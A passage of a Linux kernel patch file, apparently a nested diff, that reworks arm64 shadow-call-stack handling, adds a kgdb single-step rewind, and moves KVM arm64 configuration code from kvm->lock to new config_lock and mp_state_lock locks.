+ #ifdef CONFIG_SHADOW_CALL_STACK
+ 	scs_sp	.req	x18
+ 
+-	.macro scs_load tsk
+-	ldr	scs_sp, [\tsk, #TSK_TI_SCS_SP]
++	.macro scs_load_current
++	get_current_task scs_sp
++	ldr	scs_sp, [scs_sp, #TSK_TI_SCS_SP]
+ 	.endm
+ 
+ 	.macro scs_save tsk
+ 	str	scs_sp, [\tsk, #TSK_TI_SCS_SP]
+ 	.endm
+ #else
+-	.macro scs_load tsk
++	.macro scs_load_current
+ 	.endm
+ 
+ 	.macro scs_save tsk
+diff --git a/arch/arm64/kernel/debug-monitors.c b/arch/arm64/kernel/debug-monitors.c
+index 3da09778267ec..64f2ecbdfe5c2 100644
+--- a/arch/arm64/kernel/debug-monitors.c
++++ b/arch/arm64/kernel/debug-monitors.c
+@@ -438,6 +438,11 @@ int kernel_active_single_step(void)
+ }
+ NOKPROBE_SYMBOL(kernel_active_single_step);
+ 
++void kernel_rewind_single_step(struct pt_regs *regs)
++{
++	set_regs_spsr_ss(regs);
++}
++
+ /* ptrace API */
+ void user_enable_single_step(struct task_struct *task)
+ {
+diff --git a/arch/arm64/kernel/entry.S b/arch/arm64/kernel/entry.S
+index 11cb99c4d2987..80d763e165fc5 100644
+--- a/arch/arm64/kernel/entry.S
++++ b/arch/arm64/kernel/entry.S
+@@ -275,7 +275,7 @@ alternative_if ARM64_HAS_ADDRESS_AUTH
+ alternative_else_nop_endif
+ 1:
+ 
+-	scs_load tsk
++	scs_load_current
+ 	.else
+ 	add	x21, sp, #PT_REGS_SIZE
+ 	get_current_task tsk
+@@ -848,7 +848,7 @@ SYM_FUNC_START(cpu_switch_to)
+ 	msr	sp_el0, x1
+ 	ptrauth_keys_install_kernel x1, x8, x9, x10
+ 	scs_save x0
+-	scs_load x1
++	scs_load_current
+ 	ret
+ SYM_FUNC_END(cpu_switch_to)
+ NOKPROBE(cpu_switch_to)
+@@ -876,19 +876,19 @@ NOKPROBE(ret_from_fork)
+  */
+ SYM_FUNC_START(call_on_irq_stack)
+ #ifdef CONFIG_SHADOW_CALL_STACK
+-	stp	scs_sp, xzr, [sp, #-16]!
++	get_current_task x16
++	scs_save x16
+ 	ldr_this_cpu scs_sp, irq_shadow_call_stack_ptr, x17
+ #endif
++
+ 	/* Create a frame record to save our LR and SP (implicit in FP) */
+ 	stp	x29, x30, [sp, #-16]!
+ 	mov	x29, sp
+ 
+ 	ldr_this_cpu x16, irq_stack_ptr, x17
+-	mov	x15, #IRQ_STACK_SIZE
+-	add	x16, x16, x15
+ 
+ 	/* Move to the new stack and call the function there */
+-	mov	sp, x16
++	add	sp, x16, #IRQ_STACK_SIZE
+ 	blr	x1
+ 
+ 	/*
+@@ -897,9 +897,7 @@ SYM_FUNC_START(call_on_irq_stack)
+ 	 */
+ 	mov	sp, x29
+ 	ldp	x29, x30, [sp], #16
+-#ifdef CONFIG_SHADOW_CALL_STACK
+-	ldp	scs_sp, xzr, [sp], #16
+-#endif
++	scs_load_current
+ 	ret
+ SYM_FUNC_END(call_on_irq_stack)
+ NOKPROBE(call_on_irq_stack)
+diff --git a/arch/arm64/kernel/head.S b/arch/arm64/kernel/head.S
+index 952e17bd1c0b4..b9c1a506798ea 100644
+--- a/arch/arm64/kernel/head.S
++++ b/arch/arm64/kernel/head.S
+@@ -404,7 +404,7 @@ SYM_FUNC_END(create_kernel_mapping)
+ 	stp	xzr, xzr, [sp, #S_STACKFRAME]
+ 	add	x29, sp, #S_STACKFRAME
+ 
+-	scs_load \tsk
++	scs_load_current
+ 
+ 	adr_l	\tmp1, __per_cpu_offset
+ 	ldr	w\tmp2, [\tsk, #TSK_TI_CPU]
+diff --git a/arch/arm64/kernel/kgdb.c b/arch/arm64/kernel/kgdb.c
+index cda9c1e9864f7..4e1f983df3d1c 100644
+--- a/arch/arm64/kernel/kgdb.c
++++ b/arch/arm64/kernel/kgdb.c
+@@ -224,6 +224,8 @@ int kgdb_arch_handle_exception(int exception_vector, int signo,
+ 		 */
+ 		if (!kernel_active_single_step())
+ 			kernel_enable_single_step(linux_regs);
++		else
++			kernel_rewind_single_step(linux_regs);
+ 		err = 0;
+ 		break;
+ 	default:
+diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
+index e57f8ae093875..f092c3672afcd 100644
+--- a/arch/arm64/kvm/arm.c
++++ b/arch/arm64/kvm/arm.c
+@@ -138,6 +138,16 @@ int kvm_arch_init_vm(struct kvm *kvm, unsigned long type)
+ {
+ 	int ret;
+ 
++	mutex_init(&kvm->arch.config_lock);
++
++#ifdef CONFIG_LOCKDEP
++	/* Clue in lockdep that the config_lock must be taken inside kvm->lock */
++	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
++	mutex_unlock(&kvm->arch.config_lock);
++	mutex_unlock(&kvm->lock);
++#endif
++
+ 	ret = kvm_share_hyp(kvm, kvm + 1);
+ 	if (ret)
+ 		return ret;
+@@ -336,6 +346,16 @@ int kvm_arch_vcpu_create(struct kvm_vcpu *vcpu)
+ {
+ 	int err;
+ 
++	spin_lock_init(&vcpu->arch.mp_state_lock);
++
++#ifdef CONFIG_LOCKDEP
++	/* Inform lockdep that the config_lock is acquired after vcpu->mutex */
++	mutex_lock(&vcpu->mutex);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
++	mutex_unlock(&vcpu->mutex);
++#endif
++
+ 	/* Force users to call KVM_ARM_VCPU_INIT */
+ 	vcpu->arch.target = -1;
+ 	bitmap_zero(vcpu->arch.features, KVM_VCPU_MAX_FEATURES);
+@@ -453,34 +473,41 @@ void kvm_arch_vcpu_put(struct kvm_vcpu *vcpu)
+ 	vcpu->cpu = -1;
+ }
+ 
+-void kvm_arm_vcpu_power_off(struct kvm_vcpu *vcpu)
++static void __kvm_arm_vcpu_power_off(struct kvm_vcpu *vcpu)
+ {
+-	vcpu->arch.mp_state.mp_state = KVM_MP_STATE_STOPPED;
++	WRITE_ONCE(vcpu->arch.mp_state.mp_state, KVM_MP_STATE_STOPPED);
+ 	kvm_make_request(KVM_REQ_SLEEP, vcpu);
+ 	kvm_vcpu_kick(vcpu);
+ }
+ 
++void kvm_arm_vcpu_power_off(struct kvm_vcpu *vcpu)
++{
++	spin_lock(&vcpu->arch.mp_state_lock);
++	__kvm_arm_vcpu_power_off(vcpu);
++	spin_unlock(&vcpu->arch.mp_state_lock);
++}
++
+ bool kvm_arm_vcpu_stopped(struct kvm_vcpu *vcpu)
+ {
+-	return vcpu->arch.mp_state.mp_state == KVM_MP_STATE_STOPPED;
++	return READ_ONCE(vcpu->arch.mp_state.mp_state) == KVM_MP_STATE_STOPPED;
+ }
+ 
+ static void kvm_arm_vcpu_suspend(struct kvm_vcpu *vcpu)
+ {
+-	vcpu->arch.mp_state.mp_state = KVM_MP_STATE_SUSPENDED;
++	WRITE_ONCE(vcpu->arch.mp_state.mp_state, KVM_MP_STATE_SUSPENDED);
+ 	kvm_make_request(KVM_REQ_SUSPEND, vcpu);
+ 	kvm_vcpu_kick(vcpu);
+ }
+ 
+ static bool kvm_arm_vcpu_suspended(struct kvm_vcpu *vcpu)
+ {
+-	return vcpu->arch.mp_state.mp_state == KVM_MP_STATE_SUSPENDED;
++	return READ_ONCE(vcpu->arch.mp_state.mp_state) == KVM_MP_STATE_SUSPENDED;
+ }
+ 
+ int kvm_arch_vcpu_ioctl_get_mpstate(struct kvm_vcpu *vcpu,
+ 				    struct kvm_mp_state *mp_state)
+ {
+-	*mp_state = vcpu->arch.mp_state;
++	*mp_state = READ_ONCE(vcpu->arch.mp_state);
+ 
+ 	return 0;
+ }
+@@ -490,12 +517,14 @@ int kvm_arch_vcpu_ioctl_set_mpstate(struct kvm_vcpu *vcpu,
+ {
+ 	int ret = 0;
+ 
++	spin_lock(&vcpu->arch.mp_state_lock);
++
+ 	switch (mp_state->mp_state) {
+ 	case KVM_MP_STATE_RUNNABLE:
+-		vcpu->arch.mp_state = *mp_state;
++		WRITE_ONCE(vcpu->arch.mp_state, *mp_state);
+ 		break;
+ 	case KVM_MP_STATE_STOPPED:
+-		kvm_arm_vcpu_power_off(vcpu);
++		__kvm_arm_vcpu_power_off(vcpu);
+ 		break;
+ 	case KVM_MP_STATE_SUSPENDED:
+ 		kvm_arm_vcpu_suspend(vcpu);
+@@ -504,6 +533,8 @@ int kvm_arch_vcpu_ioctl_set_mpstate(struct kvm_vcpu *vcpu,
+ 		ret = -EINVAL;
+ 	}
+ 
++	spin_unlock(&vcpu->arch.mp_state_lock);
++
+ 	return ret;
+ }
+ 
+@@ -603,9 +634,9 @@ int kvm_arch_vcpu_run_pid_change(struct kvm_vcpu *vcpu)
+ 	if (kvm_vm_is_protected(kvm))
+ 		kvm_call_hyp_nvhe(__pkvm_vcpu_init_traps, vcpu);
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	set_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags);
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 
+ 	return ret;
+ }
+@@ -1223,7 +1254,7 @@ static int kvm_arch_vcpu_ioctl_vcpu_init(struct kvm_vcpu *vcpu,
+ 	if (test_bit(KVM_ARM_VCPU_POWER_OFF, vcpu->arch.features))
+ 		kvm_arm_vcpu_power_off(vcpu);
+ 	else
+-		vcpu->arch.mp_state.mp_state = KVM_MP_STATE_RUNNABLE;
++		WRITE_ONCE(vcpu->arch.mp_state.mp_state, KVM_MP_STATE_RUNNABLE);
+ 
+ 	return 0;
+ }
+diff --git a/arch/arm64/kvm/guest.c b/arch/arm64/kvm/guest.c
+index cf4c495a43213..a8fe8e1bbaddf 100644
+--- a/arch/arm64/kvm/guest.c
++++ b/arch/arm64/kvm/guest.c
+@@ -951,7 +951,9 @@ int kvm_arm_vcpu_arch_set_attr(struct kvm_vcpu *vcpu,
+ 
+ 	switch (attr->group) {
+ 	case KVM_ARM_VCPU_PMU_V3_CTRL:
++		mutex_lock(&vcpu->kvm->arch.config_lock);
+ 		ret = kvm_arm_pmu_v3_set_attr(vcpu, attr);
++		mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 		break;
+ 	case KVM_ARM_VCPU_TIMER_CTRL:
+ 		ret = kvm_arm_timer_set_attr(vcpu, attr);
+diff --git a/arch/arm64/kvm/hypercalls.c b/arch/arm64/kvm/hypercalls.c
+index 950e35b993d2b..1f5beebf62174 100644
+--- a/arch/arm64/kvm/hypercalls.c
++++ b/arch/arm64/kvm/hypercalls.c
+@@ -377,7 +377,7 @@ static int kvm_arm_set_fw_reg_bmap(struct kvm_vcpu *vcpu, u64 reg_id, u64 val)
+ 	if (val & ~fw_reg_features)
+ 		return -EINVAL;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 
+ 	if (test_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags) &&
+ 	    val != *fw_reg_bmap) {
+@@ -387,7 +387,7 @@ static int kvm_arm_set_fw_reg_bmap(struct kvm_vcpu *vcpu, u64 reg_id, u64 val)
+ 
+ 	WRITE_ONCE(*fw_reg_bmap, val);
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 	return ret;
+ }
+ 
+diff --git a/arch/arm64/kvm/pmu-emul.c b/arch/arm64/kvm/pmu-emul.c
+index 5eca0cdd961df..99e990a472a57 100644
+--- a/arch/arm64/kvm/pmu-emul.c
++++ b/arch/arm64/kvm/pmu-emul.c
+@@ -876,7 +876,7 @@ static int kvm_arm_pmu_v3_set_pmu(struct kvm_vcpu *vcpu, int pmu_id)
+ 	struct arm_pmu *arm_pmu;
+ 	int ret = -ENXIO;
+ 
+-	mutex_lock(&kvm->lock);
++	lockdep_assert_held(&kvm->arch.config_lock);
+ 	mutex_lock(&arm_pmus_lock);
+ 
+ 	list_for_each_entry(entry, &arm_pmus, entry) {
+@@ -896,7 +896,6 @@ static int kvm_arm_pmu_v3_set_pmu(struct kvm_vcpu *vcpu, int pmu_id)
+ 	}
+ 
+ 	mutex_unlock(&arm_pmus_lock);
+-	mutex_unlock(&kvm->lock);
+ 	return ret;
+ }
+ 
+@@ -904,22 +903,20 @@ int kvm_arm_pmu_v3_set_attr(struct kvm_vcpu *vcpu, struct kvm_device_attr *attr)
+ {
+ 	struct kvm *kvm = vcpu->kvm;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (!kvm_vcpu_has_pmu(vcpu))
+ 		return -ENODEV;
+ 
+ 	if (vcpu->arch.pmu.created)
+ 		return -EBUSY;
+ 
+-	mutex_lock(&kvm->lock);
+ 	if (!kvm->arch.arm_pmu) {
+ 		/* No PMU set, get the default one */
+ 		kvm->arch.arm_pmu = kvm_pmu_probe_armpmu();
+-		if (!kvm->arch.arm_pmu) {
+-			mutex_unlock(&kvm->lock);
++		if (!kvm->arch.arm_pmu)
+ 			return -ENODEV;
+-		}
+ 	}
+-	mutex_unlock(&kvm->lock);
+ 
+ 	switch (attr->attr) {
+ 	case KVM_ARM_VCPU_PMU_V3_IRQ: {
+@@ -963,19 +960,13 @@ int kvm_arm_pmu_v3_set_attr(struct kvm_vcpu *vcpu, struct kvm_device_attr *attr)
+ 		     filter.action != KVM_PMU_EVENT_DENY))
+ 			return -EINVAL;
+ 
+-		mutex_lock(&kvm->lock);
+-
+-		if (test_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags)) {
+-			mutex_unlock(&kvm->lock);
++		if (test_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags))
+ 			return -EBUSY;
+-		}
+ 
+ 		if (!kvm->arch.pmu_filter) {
+ 			kvm->arch.pmu_filter = bitmap_alloc(nr_events, GFP_KERNEL_ACCOUNT);
+-			if (!kvm->arch.pmu_filter) {
+-				mutex_unlock(&kvm->lock);
++			if (!kvm->arch.pmu_filter)
+ 				return -ENOMEM;
+-			}
+ 
+ 			/*
+ 			 * The default depends on the first applied filter.
+@@ -994,8 +985,6 @@ int kvm_arm_pmu_v3_set_attr(struct kvm_vcpu *vcpu, struct kvm_device_attr *attr)
+ 		else
+ 			bitmap_clear(kvm->arch.pmu_filter, filter.base_event, filter.nevents);
+ 
+-		mutex_unlock(&kvm->lock);
+-
+ 		return 0;
+ 	}
+ 	case KVM_ARM_VCPU_PMU_V3_SET_PMU: {
+diff --git a/arch/arm64/kvm/psci.c b/arch/arm64/kvm/psci.c
+index 7fbc4c1b9df04..5767e6baa61a2 100644
+--- a/arch/arm64/kvm/psci.c
++++ b/arch/arm64/kvm/psci.c
+@@ -62,6 +62,7 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	struct vcpu_reset_state *reset_state;
+ 	struct kvm *kvm = source_vcpu->kvm;
+ 	struct kvm_vcpu *vcpu = NULL;
++	int ret = PSCI_RET_SUCCESS;
+ 	unsigned long cpu_id;
+ 
+ 	cpu_id = smccc_get_arg1(source_vcpu);
+@@ -76,11 +77,15 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	 */
+ 	if (!vcpu)
+ 		return PSCI_RET_INVALID_PARAMS;
++
++	spin_lock(&vcpu->arch.mp_state_lock);
+ 	if (!kvm_arm_vcpu_stopped(vcpu)) {
+ 		if (kvm_psci_version(source_vcpu) != KVM_ARM_PSCI_0_1)
+-			return PSCI_RET_ALREADY_ON;
++			ret = PSCI_RET_ALREADY_ON;
+ 		else
+-			return PSCI_RET_INVALID_PARAMS;
++			ret = PSCI_RET_INVALID_PARAMS;
++
++		goto out_unlock;
+ 	}
+ 
+ 	reset_state = &vcpu->arch.reset_state;
+@@ -96,7 +101,7 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	 */
+ 	reset_state->r0 = smccc_get_arg3(source_vcpu);
+ 
+-	WRITE_ONCE(reset_state->reset, true);
++	reset_state->reset = true;
+ 	kvm_make_request(KVM_REQ_VCPU_RESET, vcpu);
+ 
+ 	/*
+@@ -108,7 +113,9 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	vcpu->arch.mp_state.mp_state = KVM_MP_STATE_RUNNABLE;
+ 	kvm_vcpu_wake_up(vcpu);
+ 
+-	return PSCI_RET_SUCCESS;
++out_unlock:
++	spin_unlock(&vcpu->arch.mp_state_lock);
++	return ret;
+ }
+ 
+ static unsigned long kvm_psci_vcpu_affinity_info(struct kvm_vcpu *vcpu)
+@@ -168,8 +175,11 @@ static void kvm_prepare_system_event(struct kvm_vcpu *vcpu, u32 type, u64 flags)
+ 	 * after this call is handled and before the VCPUs have been
+ 	 * re-initialized.
+ 	 */
+-	kvm_for_each_vcpu(i, tmp, vcpu->kvm)
+-		tmp->arch.mp_state.mp_state = KVM_MP_STATE_STOPPED;
++	kvm_for_each_vcpu(i, tmp, vcpu->kvm) {
++		spin_lock(&tmp->arch.mp_state_lock);
++		WRITE_ONCE(tmp->arch.mp_state.mp_state, KVM_MP_STATE_STOPPED);
++		spin_unlock(&tmp->arch.mp_state_lock);
++	}
+ 	kvm_make_all_cpus_request(vcpu->kvm, KVM_REQ_SLEEP);
+ 
+ 	memset(&vcpu->run->system_event, 0, sizeof(vcpu->run->system_event));
+@@ -229,7 +239,6 @@ static unsigned long kvm_psci_check_allowed_function(struct kvm_vcpu *vcpu, u32
+ 
+ static int kvm_psci_0_2_call(struct kvm_vcpu *vcpu)
+ {
+-	struct kvm *kvm = vcpu->kvm;
+ 	u32 psci_fn = smccc_get_function(vcpu);
+ 	unsigned long val;
+ 	int ret = 1;
+@@ -254,9 +263,7 @@ static int kvm_psci_0_2_call(struct kvm_vcpu *vcpu)
+ 		kvm_psci_narrow_to_32bit(vcpu);
+ 		fallthrough;
+ 	case PSCI_0_2_FN64_CPU_ON:
+-		mutex_lock(&kvm->lock);
+ 		val = kvm_psci_vcpu_on(vcpu);
+-		mutex_unlock(&kvm->lock);
+ 		break;
+ 	case PSCI_0_2_FN_AFFINITY_INFO:
+ 		kvm_psci_narrow_to_32bit(vcpu);
+@@ -395,7 +402,6 @@ static int kvm_psci_1_x_call(struct kvm_vcpu *vcpu, u32 minor)
+ 
+ static int kvm_psci_0_1_call(struct kvm_vcpu *vcpu)
+ {
+-	struct kvm *kvm = vcpu->kvm;
+ 	u32 psci_fn = smccc_get_function(vcpu);
+ 	unsigned long val;
+ 
+@@ -405,9 +411,7 @@ static int kvm_psci_0_1_call(struct kvm_vcpu *vcpu)
+ 		val = PSCI_RET_SUCCESS;
+ 		break;
+ 	case KVM_PSCI_FN_CPU_ON:
+-		mutex_lock(&kvm->lock);
+ 		val = kvm_psci_vcpu_on(vcpu);
+-		mutex_unlock(&kvm->lock);
+ 		break;
+ 	default:
+ 		val = PSCI_RET_NOT_SUPPORTED;
+diff --git a/arch/arm64/kvm/reset.c b/arch/arm64/kvm/reset.c
+index e0267f672b8ab..8c346b3e41e0a 100644
+--- a/arch/arm64/kvm/reset.c
++++ b/arch/arm64/kvm/reset.c
+@@ -200,7 +200,7 @@ static int kvm_set_vm_width(struct kvm_vcpu *vcpu)
+ 
+ 	is32bit = vcpu_has_feature(vcpu, KVM_ARM_VCPU_EL1_32BIT);
+ 
+-	lockdep_assert_held(&kvm->lock);
++	lockdep_assert_held(&kvm->arch.config_lock);
+ 
+ 	if (test_bit(KVM_ARCH_FLAG_REG_WIDTH_CONFIGURED, &kvm->arch.flags)) {
+ 		/*
+@@ -253,17 +253,18 @@ int kvm_reset_vcpu(struct kvm_vcpu *vcpu)
+ 	bool loaded;
+ 	u32 pstate;
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	ret = kvm_set_vm_width(vcpu);
+-	if (!ret) {
+-		reset_state = vcpu->arch.reset_state;
+-		WRITE_ONCE(vcpu->arch.reset_state.reset, false);
+-	}
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 
+ 	if (ret)
+ 		return ret;
+ 
++	spin_lock(&vcpu->arch.mp_state_lock);
++	reset_state = vcpu->arch.reset_state;
++	vcpu->arch.reset_state.reset = false;
++	spin_unlock(&vcpu->arch.mp_state_lock);
++
+ 	/* Reset PMU outside of the non-preemptible section */
+ 	kvm_pmu_vcpu_reset(vcpu);
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-debug.c b/arch/arm64/kvm/vgic/vgic-debug.c
+index 78cde687383ca..07aa0437125a6 100644
+--- a/arch/arm64/kvm/vgic/vgic-debug.c
++++ b/arch/arm64/kvm/vgic/vgic-debug.c
+@@ -85,7 +85,7 @@ static void *vgic_debug_start(struct seq_file *s, loff_t *pos)
+ 	struct kvm *kvm = s->private;
+ 	struct vgic_state_iter *iter;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	iter = kvm->arch.vgic.iter;
+ 	if (iter) {
+ 		iter = ERR_PTR(-EBUSY);
+@@ -104,7 +104,7 @@ static void *vgic_debug_start(struct seq_file *s, loff_t *pos)
+ 	if (end_of_vgic(iter))
+ 		iter = NULL;
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 	return iter;
+ }
+ 
+@@ -132,12 +132,12 @@ static void vgic_debug_stop(struct seq_file *s, void *v)
+ 	if (IS_ERR(v))
+ 		return;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	iter = kvm->arch.vgic.iter;
+ 	kfree(iter->lpi_array);
+ 	kfree(iter);
+ 	kvm->arch.vgic.iter = NULL;
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ }
+ 
+ static void print_dist_state(struct seq_file *s, struct vgic_dist *dist)
+diff --git a/arch/arm64/kvm/vgic/vgic-init.c b/arch/arm64/kvm/vgic/vgic-init.c
+index f6d4f4052555c..8c1d2d7128db6 100644
+--- a/arch/arm64/kvm/vgic/vgic-init.c
++++ b/arch/arm64/kvm/vgic/vgic-init.c
+@@ -74,9 +74,6 @@ int kvm_vgic_create(struct kvm *kvm, u32 type)
+ 	unsigned long i;
+ 	int ret;
+ 
+-	if (irqchip_in_kernel(kvm))
+-		return -EEXIST;
+-
+ 	/*
+ 	 * This function is also called by the KVM_CREATE_IRQCHIP handler,
+ 	 * which had no chance yet to check the availability of the GICv2
+@@ -87,10 +84,20 @@ int kvm_vgic_create(struct kvm *kvm, u32 type)
+ 		!kvm_vgic_global_state.can_emulate_gicv2)
+ 		return -ENODEV;
+ 
++	/* Must be held to avoid race with vCPU creation */
++	lockdep_assert_held(&kvm->lock);
++
+ 	ret = -EBUSY;
+ 	if (!lock_all_vcpus(kvm))
+ 		return ret;
+ 
++	mutex_lock(&kvm->arch.config_lock);
++
++	if (irqchip_in_kernel(kvm)) {
++		ret = -EEXIST;
++		goto out_unlock;
++	}
++
+ 	kvm_for_each_vcpu(i, vcpu, kvm) {
+ 		if (vcpu_has_run_once(vcpu))
+ 			goto out_unlock;
+@@ -118,6 +125,7 @@ int kvm_vgic_create(struct kvm *kvm, u32 type)
+ 		INIT_LIST_HEAD(&kvm->arch.vgic.rd_regions);
+ 
+ out_unlock:
++	mutex_unlock(&kvm->arch.config_lock);
+ 	unlock_all_vcpus(kvm);
+ 	return ret;
+ }
+@@ -227,9 +235,9 @@ int kvm_vgic_vcpu_init(struct kvm_vcpu *vcpu)
+ 	 * KVM io device for the redistributor that belongs to this VCPU.
+ 	 */
+ 	if (dist->vgic_model == KVM_DEV_TYPE_ARM_VGIC_V3) {
+-		mutex_lock(&vcpu->kvm->lock);
++		mutex_lock(&vcpu->kvm->arch.config_lock);
+ 		ret = vgic_register_redist_iodev(vcpu);
+-		mutex_unlock(&vcpu->kvm->lock);
++		mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 	}
+ 	return ret;
+ }
+@@ -250,7 +258,6 @@ static void kvm_vgic_vcpu_enable(struct kvm_vcpu *vcpu)
+  * The function is generally called when nr_spis has been explicitly set
+  * by the guest through the KVM DEVICE API. If not nr_spis is set to 256.
+  * vgic_initialized() returns true when this function has succeeded.
+- * Must be called with kvm->lock held!
+  */
+ int vgic_init(struct kvm *kvm)
+ {
+@@ -259,6 +266,8 @@ int vgic_init(struct kvm *kvm)
+ 	int ret = 0, i;
+ 	unsigned long idx;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (vgic_initialized(kvm))
+ 		return 0;
+ 
+@@ -373,12 +382,13 @@ void kvm_vgic_vcpu_destroy(struct kvm_vcpu *vcpu)
+ 	vgic_cpu->rd_iodev.base_addr = VGIC_ADDR_UNDEF;
+ }
+ 
+-/* To be called with kvm->lock held */
+ static void __kvm_vgic_destroy(struct kvm *kvm)
+ {
+ 	struct kvm_vcpu *vcpu;
+ 	unsigned long i;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	vgic_debug_destroy(kvm);
+ 
+ 	kvm_for_each_vcpu(i, vcpu, kvm)
+@@ -389,9 +399,9 @@ static void __kvm_vgic_destroy(struct kvm *kvm)
+ 
+ void kvm_vgic_destroy(struct kvm *kvm)
+ {
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	__kvm_vgic_destroy(kvm);
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ }
+ 
+ /**
+@@ -414,9 +424,9 @@ int vgic_lazy_init(struct kvm *kvm)
+ 		if (kvm->arch.vgic.vgic_model != KVM_DEV_TYPE_ARM_VGIC_V2)
+ 			return -EBUSY;
+ 
+-		mutex_lock(&kvm->lock);
++		mutex_lock(&kvm->arch.config_lock);
+ 		ret = vgic_init(kvm);
+-		mutex_unlock(&kvm->lock);
++		mutex_unlock(&kvm->arch.config_lock);
+ 	}
+ 
+ 	return ret;
+@@ -441,7 +451,7 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 	if (likely(vgic_ready(kvm)))
+ 		return 0;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	if (vgic_ready(kvm))
+ 		goto out;
+ 
+@@ -459,7 +469,7 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 		dist->ready = true;
+ 
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 	return ret;
+ }
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-its.c b/arch/arm64/kvm/vgic/vgic-its.c
+index 2642e9ce28199..750e51e3779a3 100644
+--- a/arch/arm64/kvm/vgic/vgic-its.c
++++ b/arch/arm64/kvm/vgic/vgic-its.c
+@@ -1958,6 +1958,16 @@ static int vgic_its_create(struct kvm_device *dev, u32 type)
+ 	mutex_init(&its->its_lock);
+ 	mutex_init(&its->cmd_lock);
+ 
++	/* Yep, even more trickery for lock ordering... */
++#ifdef CONFIG_LOCKDEP
++	mutex_lock(&dev->kvm->arch.config_lock);
++	mutex_lock(&its->cmd_lock);
++	mutex_lock(&its->its_lock);
++	mutex_unlock(&its->its_lock);
++	mutex_unlock(&its->cmd_lock);
++	mutex_unlock(&dev->kvm->arch.config_lock);
++#endif
++
+ 	its->vgic_its_base = VGIC_ADDR_UNDEF;
+ 
+ 	INIT_LIST_HEAD(&its->device_list);
+@@ -2045,6 +2055,13 @@ static int vgic_its_attr_regs_access(struct kvm_device *dev,
+ 
+ 	mutex_lock(&dev->kvm->lock);
+ 
++	if (!lock_all_vcpus(dev->kvm)) {
++		mutex_unlock(&dev->kvm->lock);
++		return -EBUSY;
++	}
++
++	mutex_lock(&dev->kvm->arch.config_lock);
++
+ 	if (IS_VGIC_ADDR_UNDEF(its->vgic_its_base)) {
+ 		ret = -ENXIO;
+ 		goto out;
+@@ -2058,11 +2075,6 @@ static int vgic_its_attr_regs_access(struct kvm_device *dev,
+ 		goto out;
+ 	}
+ 
+-	if (!lock_all_vcpus(dev->kvm)) {
+-		ret = -EBUSY;
+-		goto out;
+-	}
+-
+ 	addr = its->vgic_its_base + offset;
+ 
+ 	len = region->access_flags & VGIC_ACCESS_64bit ? 8 : 4;
+@@ -2076,8 +2088,9 @@ static int vgic_its_attr_regs_access(struct kvm_device *dev,
+ 	} else {
+ 		*reg = region->its_read(dev->kvm, its, addr, len);
+ 	}
+-	unlock_all_vcpus(dev->kvm);
+ out:
++	mutex_unlock(&dev->kvm->arch.config_lock);
++	unlock_all_vcpus(dev->kvm);
+ 	mutex_unlock(&dev->kvm->lock);
+ 	return ret;
+ }
+@@ -2749,14 +2762,15 @@ static int vgic_its_ctrl(struct kvm *kvm, struct vgic_its *its, u64 attr)
+ 		return 0;
+ 
+ 	mutex_lock(&kvm->lock);
+-	mutex_lock(&its->its_lock);
+ 
+ 	if (!lock_all_vcpus(kvm)) {
+-		mutex_unlock(&its->its_lock);
+ 		mutex_unlock(&kvm->lock);
+ 		return -EBUSY;
+ 	}
+ 
++	mutex_lock(&kvm->arch.config_lock);
++	mutex_lock(&its->its_lock);
++
+ 	switch (attr) {
+ 	case KVM_DEV_ARM_ITS_CTRL_RESET:
+ 		vgic_its_reset(kvm, its);
+@@ -2769,8 +2783,9 @@ static int vgic_its_ctrl(struct kvm *kvm, struct vgic_its *its, u64 attr)
+ 		break;
+ 	}
+ 
+-	unlock_all_vcpus(kvm);
+ 	mutex_unlock(&its->its_lock);
++	mutex_unlock(&kvm->arch.config_lock);
++	unlock_all_vcpus(kvm);
+ 	mutex_unlock(&kvm->lock);
+ 	return ret;
